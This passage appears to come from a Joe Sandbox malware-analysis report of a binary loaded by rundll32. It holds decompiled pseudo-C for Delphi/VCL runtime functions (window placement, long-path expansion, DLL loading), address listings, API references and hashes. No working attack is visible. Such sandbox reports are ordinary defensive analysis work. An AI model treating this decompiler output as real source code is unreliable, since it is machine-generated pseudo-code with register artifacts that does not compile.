									if( *((char*)(_t298 + 0x9e)) != 0) {
										_t299 = _v8;
										__eflags =  *(_t299 + 0xa0);
										if( *(_t299 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											 *(_v8 + 0xa0) = E027DD780("vcltest3.dll", _t351, 0x8000);
											_t303 = _v8;
											__eflags =  *(_t303 + 0xa0);
											if( *(_t303 + 0xa0) == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_v28 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												__eflags = _v28;
												if(_v28 != 0) {
													_t98 = _v12 + 8; // 0xfff025
													_t101 = _v12 + 8; // 0xfff025
													_v28( *((intOrPtr*)( *_t101 + 4)),  *((intOrPtr*)( *_t98 + 8)));
												}
											}
										}
									}
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t317 =  *0x2865b5c; // 0x41d1150
							E0281C94C(_t317);
							E0281D70C(_t403);
							goto L102;
						}
						_t320 = _t196 - 0x1a;
						__eflags = _t320;
						if(_t320 == 0) {
							_t183 = _v12 + 4; // 0x4408bf8
							_t321 =  *0x286472c; // 0x2865b94
							E02838820( *_t321, _t354,  *_t183);
							E0281D68C(_v8, _t351, _v12);
							E0281D70C(_t403);
							goto L102;
						}
						__eflags = _t320 == 2;
						if(_t320 == 2) {
							E0281D70C(_t403);
							_pop(_t367);
							_t329 = _v12;
							__eflags =  *((intOrPtr*)(_t329 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t329 + 1;
							_t331 = _v12;
							__eflags =  *(_t331 + 4);
							if( *(_t331 + 4) == 0) {
								E0281D508(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E0281D530(_v8, _t367);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						_t342 = _v12;
						__eflags =  *(_t342 + 4);
						if( *(_t342 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L102;
					}
					__eflags = _t196 - 0x14;
					if(_t196 > 0x14) {
						goto L101;
					}
					switch( *((intOrPtr*)(_t196 * 4 +  &M0281D843))) {
						case 0:
							0 = E027F36B4(0, __ebx, __edi, __esi);
							goto L102;
						case 1:
							goto L101;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L027D6D64();
							__eax = E0281D70C(__ebp);
							goto L102;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E0281D70C(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0281331C( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = E0281D51C(_v8);
							} else {
								_v8 = E0281D530(_v8, __ecx);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) != 0) {
									__eax = _v8;
									 *(_v8 + 0xac) = E028133D4( *(_v8 + 0xac));
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E0281D70C(__ebp);
							}
							goto L102;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L027D6CBC();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E0281D70C(__ebp);
							} else {
								__eax = E0281D748(__ebp);
							}
							goto L102;
						case 5:
							__eax = _v8;
							__eflags =  *(__eax + 0x44);
							if( *(__eax + 0x44) != 0) {
								__eax = _v8;
								 *((intOrPtr*)(_v8 + 0x44)) = E0281A330( *((intOrPtr*)(_v8 + 0x44)));
							}
							goto L102;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E0281D70C(__ebp);
							goto L102;
					}
				} else {
					_v32 = _t192 + 1;
					_v16 = 0;
					do {
						_t347 = E027EB1E0( *((intOrPtr*)(_v8 + 0xa8)), _v16);
						_t351 = _t347;
						if( *_t347() != 0) {
							_pop(_t400);
							 *[fs:eax] = _t400;
							return 0;
						}
						_v16 = _v16 + 1;
						_t17 =  &_v32;
						 *_t17 = _v32 - 1;
						__eflags =  *_t17;
					} while ( *_t17 != 0);
					goto L5;
				}
			}























































                          0x0281d794
                          0x0281d79d
                          0x0281d7a0
                          0x0281d7a5
                          0x0281d7a6
                          0x0281d7ab
                          0x0281d7ae
                          0x0281d7b6
                          0x0281d7c5
                          0x0281d7c8
                          0x0281d809
                          0x0281d80f
                          0x0281d817
                          0x0281d819
                          0x0281d81c
                          0x0281d8d0
                          0x0281d8d5
                          0x0281d926
                          0x0281d92b
                          0x0281d94c
                          0x0281d94c
                          0x0281d951
                          0x0281ddf8
                          0x0281ddfb
                          0x0281ddff
                          0x0281de15
                          0x0281de1b
                          0x0281de01
                          0x0281de0d
                          0x0281de0d
                          0x0281de86
                          0x0281de88
                          0x0281de8b
                          0x00000000
                          0x0281de8b
                          0x0281d95a
                          0x0281d95d
                          0x0281dc26
                          0x0281dc3c
                          0x0281d963
                          0x0281de7f
                          0x0281de80
                          0x0281de85
                          0x00000000
                          0x0281d95d
                          0x0281d92d
                          0x0281ddbf
                          0x0281ddc2
                          0x0281ddc6
                          0x0281dde3
                          0x0281ddee
                          0x0281ddc8
                          0x0281ddcb
                          0x0281ddd6
                          0x0281ddd6
                          0x00000000
                          0x0281ddc6
                          0x0281d933
                          0x0281d933
                          0x0281d938
                          0x0281dd65
                          0x0281dd6a
                          0x0281dd6c
                          0x0281dd72
                          0x0281dd77
                          0x0281dd7a
                          0x0281dd7d
                          0x0281dd8a
                          0x0281dd8d
                          0x0281dd91
                          0x0281dd9b
                          0x0281dd9b
                          0x0281dd91
                          0x0281dd7d
                          0x00000000
                          0x0281dd6c
                          0x0281d93e
                          0x0281d941
                          0x0281dda5
                          0x0281dda8
                          0x0281ddae
                          0x0281ddb5
                          0x00000000
                          0x0281d947
                          0x00000000
                          0x0281d947
                          0x0281d941
                          0x0281d8d7
                          0x0281dc66
                          0x0281dc69
                          0x0281dc6d
                          0x0281dc79
                          0x0281dc7f
                          0x0281dc84
                          0x0281dc86
                          0x0281dc95
                          0x0281dc9a
                          0x0281dc9c
                          0x0281dcab
                          0x0281dcb0
                          0x0281dcb2
                          0x0281dcb8
                          0x0281dcc4
                          0x0281dcd0
                          0x0281dcd8
                          0x0281dcdf
                          0x0281dcea
                          0x0281dcf3
                          0x0281dcf8
                          0x0281dd02
                          0x0281dd02
                          0x0281dcb2
                          0x0281dc9c
                          0x0281dc86
                          0x00000000
                          0x0281dc6d
                          0x0281d8dd
                          0x0281d8e2
                          0x0281d90d
                          0x0281d90d
                          0x0281d912
                          0x0281dd36
                          0x0281dd39
                          0x0281dd41
                          0x0281dd53
                          0x0281dd53
                          0x00000000
                          0x0281dd41
                          0x0281d918
                          0x0281d91b
                          0x0281dc4a
                          0x0281dc4f
                          0x0281dc51
                          0x0281dc5a
                          0x0281dc5a
                          0x00000000
                          0x0281d921
                          0x00000000
                          0x0281d921
                          0x0281d91b
                          0x0281d8e4
                          0x0281dd0e
                          0x0281dd11
                          0x0281dd19
                          0x0281dd2b
                          0x0281dd2b
                          0x00000000
                          0x0281dd19
                          0x0281d8ea
                          0x0281d8ea
                          0x0281d8ef
                          0x0281d96b
                          0x0281d973
                          0x0281d973
                          0x0281d978
                          0x0281d986
                          0x0281d97a
                          0x0281d97a
                          0x0281d97f
                          0x0281d993
                          0x0281d981
                          0x0281d99e
                          0x0281d9a3
                          0x0281d97f
                          0x00000000
                          0x0281d978
                          0x0281d8f4
                          0x0281d8f4
                          0x0281d8f7
                          0x0281db17
                          0x0281db1e
                          0x0281db30
                          0x0281db3c
                          0x00000000
                          0x0281db3c
                          0x0281d8fd
                          0x0281d902
                          0x0281de61
                          0x0281de66
                          0x0281de68
                          0x0281de6f
                          0x0281de6f
                          0x00000000
                          0x0281d908
                          0x00000000
                          0x0281d908
                          0x0281d902
                          0x0281d822
                          0x00000000
                          0x00000000
                          0x0281d828
                          0x0281d82b
                          0x0281d897
                          0x0281d89a
                          0x0281d8b9
                          0x0281d8b9
                          0x0281d8bc
                          0x0281da0e
                          0x00000000
                          0x0281da0e
                          0x0281d8c2
                          0x0281d8c5
                          0x0281db63
                          0x0281db66
                          0x0281db6c
                          0x0281db72
                          0x0281db75
                          0x0281db7c
                          0x0281db82
                          0x0281db85
                          0x0281db8c
                          0x0281dc1b
                          0x0281db92
                          0x0281dba4
                          0x0281dbaa
                          0x0281dbad
                          0x0281dbb4
                          0x0281dc03
                          0x0281dc0b
                          0x0281dbb6
                          0x0281dbbb
                          0x0281dbd2
                          0x0281dbd5
                          0x0281dbd9
                          0x0281dbe2
                          0x0281dbec
                          0x0281dbf3
                          0x0281dbf3
                          0x0281dbd9
                          0x0281dbb4
                          0x0281db8c
                          0x0281db7c
                          0x00000000
                          0x0281d8cb
                          0x00000000
                          0x0281d8cb
                          0x0281d8c5
                          0x0281d89c
                          0x0281de49
                          0x0281de4e
                          0x0281de54
                          0x00000000
                          0x0281de59
                          0x0281d8a2
                          0x0281d8a2
                          0x0281d8a5
                          0x0281de26
                          0x0281de29
                          0x0281de30
                          0x0281de3b
                          0x0281de41
                          0x00000000
                          0x0281de46
                          0x0281d8ab
                          0x0281d8ae
                          0x0281da38
                          0x0281da3d
                          0x0281da3e
                          0x0281da41
                          0x0281da45
                          0x0281da4b
                          0x0281da51
                          0x0281da54
                          0x0281da58
                          0x0281da7f
                          0x0281da94
                          0x0281da5a
                          0x0281da5d
                          0x0281da72
                          0x0281da72
                          0x00000000
                          0x0281d8b4
                          0x00000000
                          0x0281d8b4
                          0x0281d8ae
                          0x0281d82d
                          0x0281db44
                          0x0281db47
                          0x0281db4b
                          0x0281db54
                          0x0281db54
                          0x00000000
                          0x0281db4b
                          0x0281d833
                          0x0281d836
                          0x00000000
                          0x00000000
                          0x0281d83c
                          0x00000000
                          0x0281de78
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0281da16
                          0x0281da18
                          0x0281da1a
                          0x0281da22
                          0x0281da25
                          0x0281da26
                          0x0281da2c
                          0x00000000
                          0x00000000
                          0x0281da9e
                          0x0281daa1
                          0x0281daa5
                          0x0281dae1
                          0x0281dae7
                          0x0281daea
                          0x0281daf1
                          0x0281daf3
                          0x0281daf6
                          0x0281daf9
                          0x0281dafe
                          0x0281db01
                          0x0281db01
                          0x0281db0a
                          0x0281daa7
                          0x0281daaa
                          0x0281daaf
                          0x0281dab2
                          0x0281dab9
                          0x0281dabb
                          0x0281dac4
                          0x0281dac9
                          0x0281dacc
                          0x0281dacc
                          0x0281dace
                          0x0281dace
                          0x0281dad5
                          0x0281dada
                          0x00000000
                          0x00000000
                          0x0281d9c6
                          0x0281d9c9
                          0x0281d9cc
                          0x0281d9cd
                          0x0281d9d2
                          0x0281d9d4
                          0x0281d9e3
                          0x0281d9d6
                          0x0281d9d7
                          0x0281d9dc
                          0x00000000
                          0x00000000
                          0x0281d9a9
                          0x0281d9ac
                          0x0281d9b0
                          0x0281d9b6
                          0x0281d9bc
                          0x0281d9bc
                          0x00000000
                          0x00000000
                          0x0281d9ee
                          0x0281d9f1
                          0x0281d9f8
                          0x00000000
                          0x00000000
                          0x0281d7ca
                          0x0281d7cb
                          0x0281d7ce
                          0x0281d7d5
                          0x0281d7e1
                          0x0281d7e6
                          0x0281d7f2
                          0x0281d7f6
                          0x0281d7f9
                          0x00000000
                          0x0281d7f9
                          0x0281d801
                          0x0281d804
                          0x0281d804
                          0x0281d804
                          0x0281d804
                          0x00000000
                          0x0281d7d5

                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID: RegisterAutomation$vcltest3.dll
                          • API String ID: 0-2963190186
                          • Opcode ID: cbe372e846a04b4d0fd0cb2d7336ff16442ab37c6a2c9571c6ffd14533c9b6ae
                          • Instruction ID: 28b9f812897f5ccfb253bf1ceb4790fb35ac5c61d737903e20a8e3de271be0b6
                          • Opcode Fuzzy Hash: cbe372e846a04b4d0fd0cb2d7336ff16442ab37c6a2c9571c6ffd14533c9b6ae
                          • Instruction Fuzzy Hash: 12F1E57DA00208DFDB14DBA8C588B9DBBFAAF58315F5481A4E409DB2A5D734EE80CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D55A4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 53%
                          			E027D55A4(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E027D5590(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E027D5590(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L027D1354();
									while( *_t93 != 0) {
										_t90 = E027D5590(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L027D1354();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L027D135C();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L027D1354();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L027D135C();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L027D1354();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L027D1354();
						}
					}
				}
				L17:
				return _v16;
			}



















                          0x027d55b0
                          0x027d55b3
                          0x027d55b9
                          0x027d55c6
                          0x027d55ca
                          0x027d560c
                          0x027d5612
                          0x027d564f
                          0x00000000
                          0x027d5614
                          0x027d561b
                          0x027d562c
                          0x027d5631
                          0x027d5637
                          0x027d563f
                          0x027d5644
                          0x027d5652
                          0x027d5654
                          0x027d565a
                          0x027d565e
                          0x027d5665
                          0x027d5666
                          0x027d5711
                          0x027d5678
                          0x027d567c
                          0x027d5689
                          0x027d5690
                          0x027d5691
                          0x027d569a
                          0x027d569b
                          0x027d56b3
                          0x027d56b8
                          0x027d56bb
                          0x027d56c0
                          0x027d56c6
                          0x027d56c7
                          0x027d56d7
                          0x027d56d9
                          0x027d56e9
                          0x027d56f0
                          0x027d56fa
                          0x027d56fb
                          0x027d5700
                          0x027d5706
                          0x027d5707
                          0x027d570d
                          0x027d570f
                          0x00000000
                          0x027d570f
                          0x027d56d7
                          0x027d56b8
                          0x00000000
                          0x027d5689
                          0x027d571d
                          0x027d5724
                          0x027d5728
                          0x027d5729
                          0x027d5729
                          0x027d5644
                          0x027d5631
                          0x027d561b
                          0x027d55cc
                          0x027d55d7
                          0x027d55db
                          0x00000000
                          0x027d55dd
                          0x027d55dd
                          0x027d55e8
                          0x027d55ec
                          0x027d55f1
                          0x00000000
                          0x027d55f3
                          0x027d55f6
                          0x027d55fd
                          0x027d5601
                          0x027d5602
                          0x027d5602
                          0x027d55f1
                          0x027d55db
                          0x027d572e
                          0x027d5737

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00001205,028630A4,?,027D5804,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027D55C1
                          • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 027D55D2
                          • lstrcpyn.KERNEL32(?,?,?,?,027D5804,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027D5602
                          • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,00001205,028630A4,?,027D5804,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 027D5666
                          • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00000000,00001205,028630A4,?,027D5804,00000000,027D5861,?,80000001), ref: 027D569B
                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,00001205,028630A4,?,027D5804,00000000,027D5861), ref: 027D56AE
                          • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,00001205,028630A4,?,027D5804,00000000), ref: 027D56BB
                          • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,00001205,028630A4,?,027D5804), ref: 027D56C7
                          • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 027D56FB
                          • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 027D5707
                          • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 027D5729
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                          • String ID: GetLongPathNameA$\$kernel32.dll
                          • API String ID: 3245196872-1565342463
                          • Opcode ID: 81edd164401b5fadad99022b0bb126b6eef2ea93b5c11444752cde4356df83df
                          • Instruction ID: cbb1e34470ac83970b6e975c0d9a92e961d0fb5136742f7482eaac8d8b37c75e
                          • Opcode Fuzzy Hash: 81edd164401b5fadad99022b0bb126b6eef2ea93b5c11444752cde4356df83df
                          • Instruction Fuzzy Hash: F6418076A00219ABEB21DAA8CC88ADEB7FEDF48714F9401B1E949E7141E7349E448F50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02819BD8 Relevance: 18.4, APIs: 12, Instructions: 429COMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E02819BD8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				struct HWND__* _v20;
				long _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t193;
				intOrPtr _t199;
				intOrPtr _t200;
				intOrPtr _t205;
				intOrPtr _t207;
				intOrPtr _t208;
				void* _t211;
				struct HWND__* _t212;
				long _t223;
				intOrPtr _t240;
				signed int _t242;
				signed int _t243;
				intOrPtr _t244;
				signed int _t246;
				signed int _t247;
				long _t272;
				intOrPtr _t278;
				int _t283;
				intOrPtr _t284;
				intOrPtr _t295;
				signed int _t298;
				signed int _t299;
				intOrPtr _t300;
				signed int _t303;
				signed int _t304;
				intOrPtr _t306;
				intOrPtr _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t314;
				signed int _t315;
				intOrPtr _t316;
				signed int _t318;
				signed int _t319;
				intOrPtr _t328;
				signed int _t331;
				signed int _t332;
				intOrPtr _t333;
				signed int _t336;
				signed int _t337;
				intOrPtr _t338;
				intOrPtr _t340;
				intOrPtr _t341;
				signed int _t343;
				signed int _t344;
				intOrPtr _t345;
				signed int _t347;
				signed int _t348;
				intOrPtr _t355;
				signed int _t362;
				signed int _t363;
				signed int _t367;
				signed int _t368;
				long _t372;
				intOrPtr _t377;
				long _t393;
				long _t395;
				intOrPtr _t398;
				intOrPtr _t399;
				intOrPtr _t401;
				long _t404;
				long _t417;
				intOrPtr _t422;
				void* _t430;
				void* _t431;
				intOrPtr _t432;

				_t430 = _t431;
				_t432 = _t431 + 0xffffffe4;
				_v32 = 0;
				_v28 = __edx;
				_v8 = __eax;
				_push(_t430);
				_push(0x281a1a4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t432;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
					_t377 =  *0x2864784; // 0x27f53fc
					E027D6018(_t377,  &_v32);
					E027DBBC4(_v32, 1);
					E027D3A9C();
				}
				_t193 =  *0x2865b58; // 0x41d1544
				E0281F100(_t193);
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
				_push(_t430);
				_push(0x281a187);
				_push( *[fs:eax]);
				 *[fs:eax] = _t432;
				if(( *(_v8 + 0x1c) & 0x00000010) != 0) {
					L83:
					_pop(_t398);
					 *[fs:eax] = _t398;
					_push(0x281a18e);
					_t199 = _v8;
					 *(_t199 + 0x2f4) =  *(_t199 + 0x2f4) & 0x000000fb;
					return _t199;
				}
				_t200 = _v8;
				_t436 =  *((char*)(_t200 + 0x1a6));
				if( *((char*)(_t200 + 0x1a6)) == 0) {
					_push(_t430);
					_push(0x281a085);
					_push( *[fs:eax]);
					 *[fs:eax] = _t432;
					E027D3408(_v8, __eflags);
					_pop(_t399);
					 *[fs:eax] = _t399;
					_t205 =  *0x2865b5c; // 0x41d1150
					_t167 = _t205 + 0x6c; // 0x0
					__eflags =  *_t167 - _v8;
					if( *_t167 == _v8) {
						__eflags = 0;
						E02818964(_v8, 0);
					}
					_t207 = _v8;
					__eflags =  *((char*)(_t207 + 0x22f)) - 1;
					if( *((char*)(_t207 + 0x22f)) != 1) {
						_t208 = _v8;
						__eflags =  *(_t208 + 0x2f4) & 0x00000008;
						if(( *(_t208 + 0x2f4) & 0x00000008) == 0) {
							_v20 = 0;
							_t211 = E02833F7C(_v8);
							_t212 = GetActiveWindow();
							__eflags = _t211 - _t212;
							if(_t211 == _t212) {
								_t223 = IsIconic(E02833F7C(_v8));
								__eflags = _t223;
								if(_t223 == 0) {
									_v20 = E028134A0(E02833F7C(_v8));
								}
							}
							__eflags = _v20;
							if(_v20 == 0) {
								ShowWindow(E02833F7C(_v8), 0);
							} else {
								SetWindowPos(E02833F7C(_v8), 0, 0, 0, 0, 0, 0x97);
								SetActiveWindow(_v20);
							}
						} else {
							SetWindowPos(E02833F7C(_v8), 0, 0, 0, 0, 0, 0x97);
						}
					} else {
						E028314D4(_v8);
					}
					goto L83;
				}
				_push(_t430);
				_push(0x2819c93);
				_push( *[fs:eax]);
				 *[fs:eax] = _t432;
				E027D3408(_v8, _t436);
				_pop(_t401);
				 *[fs:eax] = _t401;
				if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
					if( *((char*)(_v8 + 0x22f)) != 1) {
						_t240 =  *0x2865b5c; // 0x41d1150
						_t242 = E0281B960(_t240) -  *(_v8 + 0x48);
						__eflags = _t242;
						_t243 = _t242 >> 1;
						if(_t242 < 0) {
							asm("adc eax, 0x0");
						}
						_v12 = _t243;
						_t244 =  *0x2865b5c; // 0x41d1150
						_t246 = E0281B940(_t244) -  *(_v8 + 0x4c);
						__eflags = _t246;
						_t247 = _t246 >> 1;
						if(_t246 < 0) {
							asm("adc eax, 0x0");
						}
						_v16 = _t247;
						goto L20;
					} else {
						_t295 =  *0x2865b58; // 0x41d1544
						_t32 = _t295 + 0x44; // 0x0
						_t298 = E0282D154( *_t32) -  *(_v8 + 0x48);
						_t299 = _t298 >> 1;
						if(_t298 < 0) {
							asm("adc eax, 0x0");
						}
						_v12 = _t299;
						_t300 =  *0x2865b58; // 0x41d1544
						_t36 = _t300 + 0x44; // 0x0
						_t303 = E0282D198( *_t36) -  *(_v8 + 0x4c);
						_t304 = _t303 >> 1;
						if(_t303 < 0) {
							asm("adc eax, 0x0");
						}
						_v16 = _t304;
						L20:
						if(_v12 < 0) {
							_v12 = 0;
						}
						if(_v16 < 0) {
							_v16 = 0;
						}
						_t393 = _v16;
						_t404 = _v12;
						 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
						if( *((char*)(_v8 + 0x57)) != 0) {
							E02817918(_v8, _t393, _t404);
						}
						goto L64;
					}
				} else {
					_t306 = _v8;
					__eflags =  *((intOrPtr*)(_t306 + 0x230)) + 0xfa - 2;
					if( *((intOrPtr*)(_t306 + 0x230)) + 0xfa - 2 >= 0) {
						_t310 = _v8;
						__eflags =  *((char*)(_t310 + 0x230)) - 5;
						if( *((char*)(_t310 + 0x230)) == 5) {
							_t311 = _v8;
							__eflags =  *((char*)(_t311 + 0x22f)) - 1;
							if( *((char*)(_t311 + 0x22f)) != 1) {
								_t312 =  *0x2865b5c; // 0x41d1150
								_t314 = E0281B9E0(_t312) -  *(_v8 + 0x48);
								__eflags = _t314;
								_t315 = _t314 >> 1;
								if(_t314 < 0) {
									asm("adc eax, 0x0");
								}
								_v12 = _t315;
								_t316 =  *0x2865b5c; // 0x41d1150
								_t318 = E0281B9C0(_t316) -  *(_v8 + 0x4c);
								__eflags = _t318;
								_t319 = _t318 >> 1;
								if(_t318 < 0) {
									asm("adc eax, 0x0");
								}
								_v16 = _t319;
							} else {
								_t328 =  *0x2865b58; // 0x41d1544
								_t112 = _t328 + 0x44; // 0x0
								_t331 = E0282D154( *_t112) -  *(_v8 + 0x48);
								__eflags = _t331;
								_t332 = _t331 >> 1;
								if(_t331 < 0) {
									asm("adc eax, 0x0");
								}
								_v12 = _t332;
								_t333 =  *0x2865b58; // 0x41d1544
								_t116 = _t333 + 0x44; // 0x0
								_t336 = E0282D198( *_t116) -  *(_v8 + 0x4c);
								__eflags = _t336;
								_t337 = _t336 >> 1;
								if(_t336 < 0) {
									asm("adc eax, 0x0");
								}
								_v16 = _t337;
							}
							__eflags = _v12;
							if(_v12 < 0) {
								__eflags = 0;
								_v12 = 0;
							}
							__eflags = _v16;
							if(_v16 < 0) {
								__eflags = 0;
								_v16 = 0;
							}
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
						}
					} else {
						_t338 =  *0x2865b58; // 0x41d1544
						_t63 = _t338 + 0x44; // 0x0
						_v24 =  *_t63;
						_t340 = _v8;
						__eflags =  *((char*)(_t340 + 0x230)) - 7;
						if( *((char*)(_t340 + 0x230)) == 7) {
							_t422 =  *0x2811d48; // 0x2811d94
							_t372 = E027D3398( *((intOrPtr*)(_v8 + 4)), _t422);
							__eflags = _t372;
							if(_t372 != 0) {
								_v24 =  *((intOrPtr*)(_v8 + 4));
							}
						}
						__eflags = _v24;
						if(_v24 == 0) {
							_t341 =  *0x2865b5c; // 0x41d1150
							_t343 = E0281B960(_t341) -  *(_v8 + 0x48);
							__eflags = _t343;
							_t344 = _t343 >> 1;
							if(_t343 < 0) {
								asm("adc eax, 0x0");
							}
							_v12 = _t344;
							_t345 =  *0x2865b5c; // 0x41d1150
							_t347 = E0281B940(_t345) -  *(_v8 + 0x4c);
							__eflags = _t347;
							_t348 = _t347 >> 1;
							if(_t347 < 0) {
								asm("adc eax, 0x0");
							}
							_v16 = _t348;
						} else {
							_t362 =  *((intOrPtr*)(_v24 + 0x48)) -  *(_v8 + 0x48);
							__eflags = _t362;
							_t363 = _t362 >> 1;
							if(_t362 < 0) {
								asm("adc eax, 0x0");
							}
							_v12 = _t363 +  *((intOrPtr*)(_v24 + 0x40));
							_t367 =  *((intOrPtr*)(_v24 + 0x4c)) -  *(_v8 + 0x4c);
							__eflags = _t367;
							_t368 = _t367 >> 1;
							if(_t367 < 0) {
								asm("adc eax, 0x0");
							}
							_v16 = _t368 +  *((intOrPtr*)(_v24 + 0x44));
						}
						__eflags = _v12;
						if(_v12 < 0) {
							__eflags = 0;
							_v12 = 0;
						}
						__eflags = _v16;
						if(_v16 < 0) {
							__eflags = 0;
							_v16 = 0;
						}
						_t395 = _v16;
						_t417 = _v12;
